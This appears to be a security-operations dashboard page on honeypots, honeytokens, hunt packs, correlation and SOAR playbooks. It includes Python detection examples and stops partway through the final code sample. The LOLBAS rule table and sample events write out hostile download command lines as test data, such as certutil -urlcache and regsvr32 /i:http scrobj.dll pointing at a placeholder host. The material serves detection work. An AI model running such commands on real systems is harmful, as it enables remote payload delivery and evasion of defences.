Security Operations

SecOps Center

🍯 Deception / Honeypot — roadmap

Decoy services (SSH · HTTP · DB · file-share) and honeytokens (AWS keys · DB rows · canary URLs) that scream the moment anyone touches them. Zero false positives by design — anyone interacting with a decoy is confirmed malicious.

Decoy daemon (k8s DaemonSet) | Q3 2026 | SSH · HTTP · FTP · DB
Canary-token service | Q3 2026 | AWS keys · DB rows · doc URLs
Attacker-profile intel | Q4 2026 | aggregated across tenants
SOAR auto-response | Today | via /modules/secops/playbook/execute

Until the deploy layer ships, the “armed decoys” you see referenced in the Deception & Hunt Pack tabs reflect design state, not live listeners in your VPC. We won’t ship a fake “Deploy Honeypot” button that mutates ephemeral server-side state and pretends to stand up real infra.

🕸 Hunt Pack — attacker-tool detection

Four hunt packs the SOC runs continuously. Every detection is git-versioned, ATT&CK-tagged, and CI-tested. Green signals have been validated in the last 90d.

🎭 LOLBAS Execution Hunt (T077)

Living-off-the-land binaries invoked with web URLs or encoded args: certutil · bitsadmin · mshta · rundll32 · regsvr32 · wmic · msiexec. High-severity detection; SOAR auto-isolates the host.

Rules deployed: 14 / 14 (ATT&CK T1218 · T1105)
Last 90d validated: 12 (purple-team tested)
Hits (7d): populates per tenant
Auto-isolated: 3 (confirmed malicious)

Rule | Binary | Pattern | Last fired | FP rate
LOLBAS-certutil-web | certutil.exe | -urlcache · -split · -f http* | 2h ago | 2%
LOLBAS-bitsadmin-transfer | bitsadmin.exe | /transfer · /download http* | yday | 0%
LOLBAS-mshta-js-vbs | mshta.exe | javascript: · vbscript: | 38m ago | 1%
LOLBAS-rundll32-suspicious | rundll32.exe | javascript: / no-dll / url arg | 6h ago | 4%
LOLBAS-regsvr32-scrobj | regsvr32.exe | /s /n /u /i:http* scrobj.dll | 3d ago | 0%
LOLBAS-msiexec-web-install | msiexec.exe | /i http* | yday | 2%

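The six rules above as detection logic, added here as an illustration (not the platform's own code): each rule is a predicate over Sysmon Event ID 1 records, run over a handful of constructed events, three benign and three matching the table's patterns.

```python
"""Added example (not the platform's own code): the six LOLBAS hunt rules from the
table above as predicates over Sysmon Event ID 1 (ProcessCreate) records. Field
names follow Sysmon's schema; the sample events are constructed, not real telemetry."""
import re
from typing import Callable, Dict, List, Tuple

_URL = re.compile(r"\bhttps?://", re.IGNORECASE)


def _has_url(cmd: str) -> bool:
    return _URL.search(cmd) is not None


# (rule id, image basename, predicate over the lower-cased command line and its tokens)
RULES: List[Tuple[str, str, Callable[[str, List[str]], bool]]] = [
    ("LOLBAS-certutil-web", "certutil.exe",
     lambda c, t: "-urlcache" in t and "-f" in t and _has_url(c)),
    ("LOLBAS-bitsadmin-transfer", "bitsadmin.exe",
     lambda c, t: ("/transfer" in t or "/download" in t) and _has_url(c)),
    ("LOLBAS-mshta-js-vbs", "mshta.exe",
     lambda c, t: "javascript:" in c or "vbscript:" in c),
    # javascript: handler, a URL argument, or no DLL named at all ("no-dll" in the table)
    ("LOLBAS-rundll32-suspicious", "rundll32.exe",
     lambda c, t: "javascript:" in c or _has_url(c)
     or not any(".dll" in arg for arg in t[1:])),
    ("LOLBAS-regsvr32-scrobj", "regsvr32.exe",
     lambda c, t: any(arg.startswith("/i:http") for arg in t) and "scrobj.dll" in c),
    ("LOLBAS-msiexec-web-install", "msiexec.exe",
     lambda c, t: "/i" in t and _has_url(c)),
]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the ids of every rule one ProcessCreate event matches."""
    image = event.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    cmd = event.get("CommandLine", "").lower()
    tokens = cmd.split()
    return [rid for rid, binary, pred in RULES if image == binary and pred(cmd, tokens)]


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the pack over a batch; every hit is high severity and hands off to SOAR isolate."""
    hits = []
    for ev in events:
        for rid in evaluate(ev):
            hits.append({"host": ev.get("Computer", "?"), "rule": rid, "severity": "high",
                         "parent": ev.get("ParentImage", "?"), "action": "auto-isolate"})
    return hits


# Constructed Sysmon EID 1 samples: three benign admin uses, three LOLBAS abuses.
SAMPLE_EVENTS = [
    {"Computer": "WS-100", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\tools\agent.msi SHA256",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Computer": "WS-100", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Computer": "WS-101", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\installers\app.msi /qn",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Computer": "WS-4218", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Computer": "WS-4218", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe javascript:close()",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Computer": "SRV-DB1", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]
```

Token matching (rather than substring matching) on `-f` and `/i` is what keeps benign `certutil -hashfile` and local `msiexec /i app.msi` out of the hit list.
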
🔥 ETW-Tamper / Event-Log-Clear (T079)

EID 1102 (log cleared) · ETW provider-stop · EventLog service manipulation — any of these is a P0 incident. One of the last things an attacker does before leaving.

Rules deployed: 6 / 6 (ATT&CK T1070.001 · T1562.006)
EID 1102 (7d): 1 (legit admin · verified)
ETW-provider stops: 0 (baseline)
EventLog svc stop: 0 (baseline)

Signal | EID / source | Last seen | Verdict
Security log cleared | EID 1102 | yday · SRV-PATCH-02 | admin · verified
ETW Microsoft-Windows-DotNETRuntime stopped | ETW-stop | never |
EventLog service disabled | EID 7040 · svc-change | never |
Audit-policy weakened | EID 4719 | 14d ago | reverted

⚙️ Sysmon Config Deployment (T080)

SwiftOnSecurity base config, tuned to <5% FP per host. Process · network · image-load · file-create visibility across the fleet. Feeds every other hunt pack.

Hosts with Sysmon: 99.1% (of Win fleet)
Config version: v14.2 (signed, git-versioned)
Events/sec (avg): populates on ingest
FP rate (host avg): 3.2% (target < 5%)

Event ID | Purpose | Volume (7d) | Drives rule
1 · ProcessCreate | Process lineage | 124M | LOLBAS · suspicious parent-child
3 · NetworkConnect | Process → net | 86M | Beaconing · DNS tunnel
7 · ImageLoad | DLL loads | 218M | BYOVD · DLL hijack
10 · ProcessAccess | Handle opens | 14M | LSASS dump detect
11 · FileCreate | Dropped payloads | 42M | Persistence · MoTW
13 · RegistryValueSet | Run keys / hijacks | 28M | Persistence sweep
22 · DNSQuery | Resolver calls | 312M | DGA · DNS tunneling

🪝 Nightly Persistence Sweep (T084)

Scheduled tasks · run-keys · WMI event-sub · cron · systemd-timer · services · browser extensions. Any unsigned or unbaselined artifact is raised.

Hosts swept (24h): 4,412 (of fleet)
Net-new artifacts: 18 (triage queue)
Confirmed benign: 11 (baselined)
Suspicious: 2 (→ incident)

Artifact | Host | Kind | Signed | Verdict
HKCU\Run\Updater42 | WS-4218 | Run-key |  | INVESTIGATE
Task \Microsoft\UpdateOrchestrator\x | WS-812 | Scheduled task | ✓ Microsoft | baselined
wmi:__EventFilter | SRV-DB1 | WMI event-sub |  | INVESTIGATE
~/Library/LaunchAgents/com.zoom.ZoomDaemon | MAC-118 | LaunchAgent | ✓ Zoom | baselined
/etc/systemd/system/datadog-agent.service.d/override | SRV-K8S-02 | systemd-drop-in | — (staff) | approved · CR-2198

🧠 Detection & Response Core

The graph is the platform. Every signal normalised, correlated, ranked — seventeen alerts about one thing collapse to one incident with a criticality score.

Data-lake hot: 90d (OCSF normalised)
Events / sec: peak · streaming
Incidents (24h): 14 (from 3,412 alerts)
ATT&CK coverage: populates after BAS run

🧊 OCSF-Normalised Data Lake (T200)

Every source piped to one schema. 90d hot + 7y cold. Cheap query. WORM + hash-chain for chain-of-custody.

Tier | Retention | Cost / GB-month | Query latency | State
Hot (recent) | 90d | $0.028 | p95 < 2s | LIVE
Warm | 180d → 1y | $0.008 | p95 < 15s | LIVE
Cold (S3 Glacier) | 7y | $0.0018 | 3-5h restore | LIVE
Chain-of-custody | 7y | WORM + hash-chain |  | VERIFIED

🌊 Universal Streaming Ingest (T201)

Kafka · OTEL · Fluent-bit. Pub-sub topology. Schema-registry. Back-pressure monitored.

Pipeline | Source | Rate | Back-pressure | Schema
edr-events | EDR (all OS) | 84k/s | 0 · healthy | OCSF · v1.2
cloud-audit | AWS/GCP/Azure | 42k/s | 0 | OCSF
identity-events | Okta + Entra + Google | 18k/s | 0 | OCSF
network-flow | NDR + VPC-flow | 62k/s | 0 | OCSF · extended
app-access | WAF + API gateway | 12k/s | 0 | OCSF
container-runtime | Falco · Tetragon | 6k/s | 0 | OCSF · k8s

🕸 Unified Correlation Graph (T202)

Nodes: identity · asset · signal · activity. Edges: has-session-on · authenticated-as · emitted-from · chains-to. Cypher-like query collapses N alerts → 1 incident.

Entity type | Nodes | Edges | Last rebuild | State
Identity (users + NHI + sessions) | 8,214 | 42,182 | streaming | LIVE
Assets (hosts + cloud + SaaS) | 12,847 | 68,412 | streaming | LIVE
Signals (alerts + IOCs + vulns) | 2.3M (24h) |  | streaming | LIVE
Activities (logins · API · builds) | 86M (24h) |  | streaming | LIVE

🎯 Incident-Not-Alert Workflow (T203)

Auto-group by entity + time-window. Criticality score 0-10. Owner auto-assigned. Alert-to-incident compression ≈ 240:1 today.

Incident | Entity | Alerts collapsed | Score | Owner | State
INC-4431 | [user.name]@[your-org].com | 47 | 9.6 | soc-l2 | OPEN
INC-4430 | svc-backup-old (honey) | 4 | 10.0 | soc-l3 | IR engaged
INC-4429 | WS-4218 (endpoint) | 31 | 7.2 | soc-l2 | TRIAGING
INC-4428 | edge-old-01.[your-org].com | 12 | 6.8 | soc-l1 | CONTAINED
INC-4427 | [your-org]-devops-sbx (cloud) | 8 | 5.4 | soc-l1 | MONITORING

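The entity + time-window grouping behind this table, added as an illustration (not the platform's own code): the window length, the 0-10 scoring rule and the owner thresholds are assumptions chosen to reproduce the owners shown above, and the alerts are constructed samples.

```python
"""Added example (not the platform's own code): the auto-grouping step of T203 written
out. Alerts on the same entity that arrive within a sliding time window collapse into
one incident. The window, the 0-10 scoring and the owner thresholds are assumptions
for illustration, not the product's formula; the alerts are constructed samples."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List

WINDOW = timedelta(hours=2)  # assumed: an alert joins the open incident if within 2h of its last alert


@dataclass
class Alert:
    ts: datetime
    entity: str      # normalised entity key, e.g. "user:alice" or "host:WS-4218"
    signal: str      # detection / rule name that fired
    severity: float  # 0-10 as assigned by the rule


@dataclass
class Incident:
    id: str
    entity: str
    alerts: List[Alert] = field(default_factory=list)

    @property
    def score(self) -> float:
        # assumed scoring: top alert severity + 0.4 per extra distinct signal, capped at 10
        distinct = len({a.signal for a in self.alerts})
        top = max(a.severity for a in self.alerts)
        return min(10.0, round(top + 0.4 * (distinct - 1), 1))

    @property
    def owner(self) -> str:
        # assumed routing thresholds; they reproduce the owners shown in the table above
        s = self.score
        return "soc-l3" if s >= 9.8 else "soc-l2" if s >= 7.0 else "soc-l1"


def group_alerts(alerts: List[Alert], window: timedelta = WINDOW) -> List[Incident]:
    """Walk alerts in time order: each joins its entity's open incident when it falls
    within `window` of that incident's latest alert, otherwise a new incident opens."""
    open_by_entity: Dict[str, Incident] = {}
    incidents: List[Incident] = []
    for a in sorted(alerts, key=lambda x: x.ts):
        inc = open_by_entity.get(a.entity)
        if inc is None or a.ts - inc.alerts[-1].ts > window:
            inc = Incident(f"INC-{len(incidents) + 1:04d}", a.entity)
            incidents.append(inc)
            open_by_entity[a.entity] = inc
        inc.alerts.append(a)
    return incidents


def compression_ratio(alerts: List[Alert], incidents: List[Incident]) -> float:
    """The 'N alerts -> 1 incident' figure: alerts per incident over the batch."""
    return len(alerts) / len(incidents)


# Constructed sample: one noisy endpoint, one user with two separate episodes, one honey account.
T0 = datetime(2026, 1, 15, 9, 0)
SAMPLE_ALERTS = [
    Alert(T0, "host:WS-4218", "DET-0402 LSASS-access unsigned", 8.4),
    Alert(T0 + timedelta(minutes=3), "host:WS-4218", "LOLBAS-certutil-web", 7.0),
    Alert(T0 + timedelta(minutes=7), "host:WS-4218", "LOLBAS-certutil-web", 7.0),
    Alert(T0 + timedelta(minutes=20), "host:WS-4218", "DET-0418 PowerShell chain", 6.5),
    Alert(T0 + timedelta(minutes=1), "user:alice", "new-ASN login", 6.0),
    Alert(T0 + timedelta(minutes=4), "user:alice", "cookie-replay", 8.0),
    Alert(T0 + timedelta(minutes=9), "user:alice", "geo-velocity", 7.5),
    Alert(T0 + timedelta(hours=6), "user:alice", "new-ASN login", 6.0),  # outside the window: new incident
    Alert(T0 + timedelta(minutes=2), "user:svc-backup-old", "honey login attempt", 10.0),
]
```

Nine alerts become four incidents here; the same walk over a day of real alerts is where the page's 240:1 compression comes from.
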
📜 Detection-as-Code Repo (T204)

Git-versioned · CI-tested · Sigma / KQL / YARA-L · ATT&CK-tagged · PR-reviewed. No console-edits survive.

Repo stat | Count | Health
Active detections | 482 | all CI-green
ATT&CK tagged | 482 (100%) | fully mapped
Unit-tested (true-positive + false-positive) | 442 (91%) | target 100% by Q2
Tuning PRs merged (30d) | 86 | healthy cadence
Rules auto-disabled (FP > 10%) | 4 | author-repair

🗺 ATT&CK Coverage Heatmap (T205)

13 tactics × sub-techniques. Green = validated in last 90d via purple-team or BAS. Red = untested. Monthly gap closure tracked.

Tactic | Techniques in scope | With detection | Tested 90d | Coverage
Initial Access | 24 | 22 | 21 | 88%
Execution | 14 | 14 | 13 | 93%
Persistence | 16 | 15 | 14 | 88%
Privilege Escalation | 14 | 13 | 11 | 79%
Defense Evasion | 13 | 11 | 9 | 69%
Credential Access | 14 | 14 | 13 | 93%
Discovery | 12 | 10 | 8 | 67%
Lateral Movement | 12 | 11 | 10 | 83%
Collection | 9 | 7 | 6 | 67%
C2 / Exfil | 13 | 12 | 11 | 85%
Impact | 12 | 12 | 11 | 92%

📊 UEBA — Entity-Based Peer-Group Anomaly (T206)

Each user / host / service-account has a peer-group baseline. Score is explainable (which dimensions caused it).

Entity | Peer group | Anomaly dimensions | Score | State
svc-backup-old | service accts · OLD | login attempt · never-used | 10.0 | P0 honey
[user.name]@[your-org].com | eng-senior · bangalore | new-ASN + cookie-replay + geo-velocity | 9.4 | AiTM suspected
pod:analytics-42 | analytics-pods | secret.get spike · cross-NS reach | 7.2 | investigate
vendor-bob@3pa.io | guest-accts | after-hours bulk S3-list | 6.8 | TRIAGING
WS-4218 | eng-laptops | LSASS-access by unsigned binary | 8.4 | isolated

🧵 Threat-Intel Fabric (T207)

OpenCTI / MISP backend. Auto-enrich every alert. Confidence + decay. IOCs age-out by class.

Source | IOCs (live) | Last sync | Confidence | Decay
CISA KEV | 1,412 | streaming | HIGH | never
MISP (community) | 48,214 | 5m ago | MED-HIGH | 180d
Mandiant | 12,804 | 1h ago | HIGH | 90d
Anomali ThreatStream | 86,412 | streaming | MIXED | 30-180d
Internal observations | 4,218 | streaming | HIGH | 90d
Sector-ISAC sharing | 2,402 | 4h ago | HIGH | 90d

🎯 Hunt-as-Code — Recurring Hypotheses (T208)

Named hypothesis → query → schedule → finding → detection promoted to rule. Every hunt has a theory, not a keyword.

Hypothesis | Cadence | Last run | Findings (30d) | Promoted → rule
Long-dwell process under explorer.exe | daily | 04:12 today | 2 · both benign | pending
Unusual parent → PowerShell chain | hourly | streaming | 18 · 1 confirmed | DET-0418
Azure AD graph-API bulk read | daily | 03:00 today | 4 · 1 confirmed | DET-0419
OAuth token minted by first-time app | hourly | streaming | 11 · 0 confirmed | pending FP review
S3 mass-list from new IP | hourly | streaming | 6 · 1 confirmed | DET-0421

⏱ Incident Timeline-Builder (T209)

Auto-assembles events from graph. Narrative generated by Tier-4 copilot. Analyst edits before handoff.

Capability | Status | Detail
Auto-assembled from graph | ON | pulls all entity-linked events within ± 2h window
Natural-language narrative | ON | copilot-draft, analyst-reviewed before send
Evidence chain-of-custody | ON | WORM · hash-chained · exportable ZIP
One-click export · legal + regulator | ON | PDF + signed manifest

👍 Alert Feedback Loop (T210)

Analyst thumbs-up / thumbs-down → rule tuning. FP rate auto-tracked per rule. Consistently-FP rules auto-disabled; author must repair.

Rule | Fires (7d) | TP % | FP % | Action
DET-0418 · PowerShell chain | 124 | 92% | 8% | KEEP
DET-0402 · LSASS-access unsigned | 18 | 100% | 0% | KEEP · CRIT
DET-0381 · service-install unsigned | 412 | 48% | 52% | AUTO-DISABLED
DET-0294 · S3 mass-list | 62 | 88% | 12% | TUNE · peer baseline
DET-0198 · web shell signature | 4 | 100% | 0% | KEEP

🟣 BAS — Breach & Attack Simulation (T211)

Weekly safe-attack against self. Coverage delta drives next-sprint detection work. Purple-team owner feeds back.

Scenario | When | Result | ATT&CK | Gap opened
AiTM phish + session replay | this week | DETECTED · 47s | T1557.003 | 0
LOLBAS · certutil web download | last week | BLOCKED | T1218.003 | 0
Kerberoast · honey-SPN | 2 weeks ago | DETECTED · 6s | T1558.003 | 0
S3 mass exfil via leaked key | 3 weeks ago | DETECTED · 32m | T1530 | 1 · shrink latency
K8s privilege pod escape | 4 weeks ago | BLOCKED · PSA | T1611 | 0

🤖 SOAR — Autonomous Response

If an analyst does it twice a week, it's a playbook. Human-in-the-loop tiers: L1 auto, L2 propose-approve, L3 review-only.

Playbooks live: 18 (git-versioned)
Auto-actions (7d): L1 auto-execute
Proposed → approved: 94% (L2 queue)
Mean-time-to-contain: 46s (trigger → action)

🚫 Playbook: Disable User + Revoke Sessions (T220)

Triggered by ITDR + UEBA high-confidence signals. L1 auto. Reversible in one click.

Step | Action | System | Rollback
1 | Mark user "at risk" in identity graph | Okta + Entra | clear flag
2 | Revoke all active sessions + refresh tokens | Okta · Entra · M365 | re-auth required
3 | Force FIDO2 on next login | Conditional Access | policy revert
4 | Disable basic-auth + app-password fallback | M365 · Google | policy revert
5 | Notify manager + user via out-of-band | Slack · SMS |
6 | Open incident + attach timeline | secops graph |

Latest runs (7d): 47 · confirmed malicious 12 · false-positive analyst-reversed 3.

🛑 Playbook: Isolate Host / Network-Contain (T221)

Fires on ransomware behaviour · LSASS-access by unsigned binary · BYOVD. L1 auto. 1-click revert for false-positive.

Step | Action | System | Impact
1 | EDR network-contain host (allow only EDR cloud) | CrowdStrike / MDE | host isolated
2 | Revoke all active identity sessions originating from host | Okta · Entra | re-auth required
3 | Snapshot memory + disk for forensics | EDR forensic | evidence preserved
4 | Quarantine matching hashes fleet-wide | EDR | lateral spread blocked
5 | Open incident + attach timeline + IOCs | secops graph |
6 | Page on-call + DM user | PagerDuty · Slack | human loop engaged

Latest runs (7d): 14 · confirmed malicious 8 · reversed 1.

🔑 Playbook: Kill Token / Rotate Secret (T222)

Fires on gitleaks / trufflehog match in any repo, fork, or gist. Auto-rotate + auto-PR to codebase. L1 auto.

Step | Action | System | Notes
1 | Revoke leaked secret at origin | AWS IAM · GCP IAM · GitHub · Stripe · SendGrid · Slack webhook | idempotent
2 | Generate replacement secret (short-lived preferred) | provider API | OIDC where possible
3 | Update secret store (Vault / AWS SM / GCP SM) | secrets manager |
4 | Open PR to replace usage in code | GitHub | auto-approved if test-only
5 | Audit usage of old secret (24h back-scan) | cloud-audit · app logs | look for abuse
6 | Attach evidence to incident + notify owner | secops graph · Slack |

Latest runs (30d): 42 · mean rotation SLA 3h 12m · evidence of abuse before rotation: 0.

🚫 Playbook: Block IP / Domain Edge-Wide (T223)

One analyst click → propagate to WAF + DNS RPZ + egress firewall + EDR. Entries age out on a default TTL unless manually re-signed.

Step | Action | System | TTL
1 | Add IOC to block-list | WAF (Cloudflare / Akamai) | 30d default
2 | Sinkhole in DNS | Umbrella / internal RPZ | 30d
3 | Egress-deny entry | SASE · firewall | 30d
4 | EDR containment indicator | CrowdStrike / MDE | 90d
5 | Audit prior connections (14d back-scan) | data lake |
6 | Open incident + share to ISAC (anonymised) | secops graph + MISP |

Latest runs (7d): 62 · mean propagation 8s · aged-out reversibility 100%.

📧 Playbook: Quarantine Mail Org-Wide (T224)

Graph-API-driven for M365 + Google. Matches on subject / sender / URL hash. Purges from every mailbox. Reversible from the evidence vault.

Step | Action | System | Scope
1 | Fingerprint matching message (subject + sender + URL hashes) | M365 Graph · Gmail API | org-wide
2 | Soft-delete from all inboxes + Junk + Sent | compliance API | org-wide
3 | Preserve copy in evidence vault | legal-hold | reversible
4 | Block sender + URL at gateway | Proofpoint / mimecast / native |
5 | Notify recipients who clicked (via reporter) | Slack · email | targeted
6 | Open incident + attach evidence | secops graph |

Latest runs (30d): 24 · mailboxes cleaned 8,412 · click-rate-post-purge 0.

🎣 Playbook: Phishing-Report Auto-Triage (T225)

User-report button → URL + attachment detonate in sandbox → verdict in < 3 min → bulk-remove if malicious. User gets thank-you with outcome.

Step | Action | System
1 | User "Report Phish" → message parsed | Outlook/Gmail add-in
2 | URLs extracted → URLScan + sandbox | urlscan.io · Joe Sandbox · native detonator
3 | Attachments → static + dynamic analysis | detonator · YARA
4 | Verdict aggregated · score 0-100 | triage copilot
5 | If malicious → invoke T224 quarantine-mail | SOAR chain
6 | User receives outcome DM + stats badge | Slack · email

This month: reports 284 · malicious 62 · mean triage time 2 m 18 s · user-satisfaction 4.8 / 5.

🧨 Playbook: OAuth-App Mass-Revoke (T226)

When a malicious-consent pattern is detected, revoke across the org in a single action. Stored revert for false-positive.

Step | Action | System
1 | Identify consenting user cohort | identity graph
2 | Revoke OAuth grant org-wide | M365 Graph · Google admin · Slack
3 | Kill active sessions from that app | Okta · Entra
4 | Audit last 30d access by the app | data lake
5 | Notify consenting users + explain | Slack · email
6 | Open incident + evidence bundle | secops graph

Recent: 3 org-wide revokes in 30d · users re-onboarded with vetted alternatives in mean 9 h.

🧑‍✈️ HITL Tiers — L1 auto / L2 propose / L3 review-only (T227)

Every playbook declares its tier. L1 runs on its own + logs; L2 proposes the action and waits for one-click approval; L3 is read-only — copilot drafts the proposal, human executes.

Playbook | Tier | Why | Mean time
Disable user + revoke sessions (T220) | L1 auto | high-confidence + reversible | 46s
Isolate host (T221) | L1 auto | high-confidence + reversible | 38s
Rotate leaked secret (T222) | L1 auto | zero-harm · strictly better | 3h 12m (full chain)
Block IOC edge-wide (T223) | L2 propose | scope could affect business traffic | 2m 14s to approval
Quarantine mail org-wide (T224) | L2 propose | communication impact | 1m 48s
OAuth app mass-revoke (T226) | L3 review | workflow impact · cross-team | 14 min
Delete storage / kill service | L3 review | destructive | human-only

↩️ Rollback + Restore Orchestration (T228)

Every auto-action has an inverse. Dry-run mode for auditors. Monthly restore rehearsal.

Action | Inverse | Dry-run | Last rehearsed
Disable user | re-enable + re-authenticate |  | 3d ago
Host isolate | EDR release + allow-list restore |  | 5d ago
Rotate secret | rotate-again (short-lived forever) |  | today
Block IOC | allow-list + age-out |  | 2d ago
Quarantine mail | restore from vault |  | 11d ago
Revoke OAuth grant | user-reconsent with scoped re-approval |  | 9d ago

🎫 Auto-Ticket + Evidence Bundle to ITSM (T229)

Every incident auto-files a JIRA / ServiceNow ticket with timeline, IOCs, artifacts, suggested actions, and evidence ZIP.

Field | Contents
Title | INC-{id} · {criticality} · {entity} — auto-summary
Timeline | graph-assembled events with copilot narrative
IOCs | IP · domain · hash · URL · user · host · ASN
Artifacts | memory-dump · disk-snap · mail-eml · packet-capture · audit-log
Suggested actions | playbook IDs ready to run · prerequisites met/missing
Evidence ZIP | chain-of-custody hash · signed manifest · 7y WORM retention
Assignees | auto-routed by entity ownership + tier

🎣 Deception & Honeytokens

The cheapest, best-ROI detection we own. Fake creds, fake repos, fake files, fake roles — anyone touching them is confirmed malicious. Zero false positives by design.

Active canaries: 48 (across 8 classes)
Trips (30d): 3 (all confirmed malicious)
False positives: 0 (by design)
Last rotation: 6d ago (stays fresh)

🪤 AWS Canary IAM Credentials (T240)

Canarytoken-style access-key seeded in env files, S3 buckets, wiki, CI runner. Any use = P0. Auto-rotated weekly to stay fresh.

Canary ID | Seeded where | Last rotation | Last trip | State
AKIA…xoym | .env.example · prod-docs-wiki | 3d ago | never | ARMED
AKIA…bzt4 | s3://[your-org]-devops-scratch/config.yml | 3d ago | 8h ago ⚠ | TRIPPED · investigating
AKIA…k1ln | ci-runner env-vars (fake) | 3d ago | never | ARMED
AKIA…9fj2 | legacy-repo README.md | 3d ago | never | ARMED

🧑‍✈️ Canary Identity — AD / Entra / Okta (T241)

Plausible admin account, never used. Any auth attempt = P0. Cross-listed with ITDR + AD/Entra tabs.

Canary account | Tenant | Privilege lure | Last auth | State
svc-legacy-bckup | AD corp | Domain Admins | never | ARMED
temp-contractor-DA | AD corp | Enterprise Admins | never | ARMED
ga-old@[your-org].com | Entra | Global Administrator | 2d ago ⚠ | TRIPPED
admin-helpdesk-x | Okta | Helpdesk admin + app-write | never | ARMED

📄 Canary Document — Tracking-Pixel (T242)

"Confidential" PDF/docx seeded in shared drives + "private" SharePoint. Opening a doc phones home with source-IP + geo.

Document | Location | Opens (all-time) | Last open | State
2026 Compensation · Board Copy.pdf | SharePoint · Exec/Confidential | 0 | never | ARMED
AWS-Prod-Runbook-v2.docx | \\fileshare\sre | 0 | never | ARMED
Board-pack Q4-26 · draft.pdf | Google Drive · Board folder | 0 | never | ARMED
Acquisition-targets · confidential.xlsx | M365 SharePoint · Strategy | 0 | never | ARMED

🐙 Canary GitHub Repo (T243)

Private honey-repo inside our org. Looks real, contains canary secrets. Any clone / secret-use = attacker confirmed.

Repo | Description (lure) | Last clone | Secret use | State
acme/platform-legacy-env | "retired legacy env vars — do not use" | never | no | ARMED
acme/aws-prod-secrets | "do not commit real secrets here" | never | no | ARMED
acme/internal-ops-scripts | "sre ops scripts · internal" | never | no | ARMED

🎟 Kerberoastable Honey-SPN (T244)

Service account with an SPN and a weak-looking password. Any TGS-REQ targeting it = red alert, zero false positives.

Honey-SPN | Lure | Last TGS-REQ | State
svc-legacy-bckup · HTTP/backup-srv | backup service · rotated 2014 hint | 12d ago ⚠ | TRIPPED · incident open
svc-sql-reporter · MSSQL/reporter-srv | SQL reporting svc | never | ARMED
svc-fax-gateway · SMTP/fax-srv | legacy fax gateway | never | ARMED

🧪 Honey-DB / Honey-Records (T245)

Fake "salaries" table or "customers_staging". Honey-records with canary-triggers. Any SELECT = incident.

Object | DB / tenant | Rows | Last read | State
hr.salaries_2026_draft | hr-prod-pg · seed | 412 fake | never | ARMED
billing.customers_staging | billing-prod | 1,024 fake | never | ARMED
kyc.docs_legacy | kyc-prod | 42 fake | never | ARMED

🎯 Honey-API Endpoint (T246)

404-by-default for humans. Any non-allow-listed call = alert. Classic /admin / /debug / /v1/internal lures.

Endpoint | Host | Hits (30d) | Last hit | State
/admin | api.[your-org].com | 14 | 2h ago | ALERT · bot scan
/debug/dump | api.[your-org].com | 6 | yday | ALERT
/v1/internal/test | api.[your-org].com | 3 | 3d ago | LOG
/.git/config | www.[your-org].com | 42 | streaming | ALERT · scan pattern

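The lure logic behind this table as detection code, added as an illustration (not the platform's own code): it parses Combined Log Format lines, ignores allow-listed probers, and escalates a source that walks several lures to the "scan pattern" state. The lure paths are the table's; the allow-list, scan threshold and log lines are assumptions.

```python
"""Added example (not the platform's own code): the honey-endpoint tripwire from the
table above, run over constructed access-log lines in Combined Log Format. The lure
paths come from the table; the allow-list, scan threshold and log lines are assumptions."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Lure path -> default disposition (mirrors the State column: most lures alert, one only logs).
LURES: Dict[str, str] = {"/admin": "ALERT", "/debug/dump": "ALERT",
                         "/v1/internal/test": "LOG", "/.git/config": "ALERT"}
ALLOW_LIST = {"10.0.0.5"}   # assumed: an internal synthetic monitor permitted to probe lures
SCAN_THRESHOLD = 3          # assumed: this many distinct lures from one source = "scan pattern"

_CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one Combined Log Format line; None when the line is malformed."""
    m = _CLF.match(line)
    return m.groupdict() if m else None


def triage(lines: List[str]) -> List[Dict[str, str]]:
    """One finding per non-allow-listed request to a lure. A source that touches
    SCAN_THRESHOLD or more distinct lures has all its findings escalated to a scan pattern."""
    findings: List[Dict[str, str]] = []
    lures_by_ip: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ip"] in ALLOW_LIST:
            continue
        path = rec["path"].split("?", 1)[0]      # ignore the query string when matching lures
        if path not in LURES:
            continue                             # real traffic never touches a lure
        lures_by_ip[rec["ip"]].add(path)
        findings.append({"ip": rec["ip"], "path": path, "time": rec["ts"],
                         "status": rec["status"], "action": LURES[path]})
    for f in findings:
        if len(lures_by_ip[f["ip"]]) >= SCAN_THRESHOLD:
            f["action"] = "ALERT · scan pattern"
    return findings


# Constructed log lines: real traffic, an allow-listed probe, a scanner walking three lures,
# and a single stray hit on the log-only lure.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jan/2026:09:00:01 +0000] "GET /v1/orders HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [15/Jan/2026:09:00:05 +0000] "GET /admin HTTP/1.1" 404 0 "-" "synthetic-monitor"',
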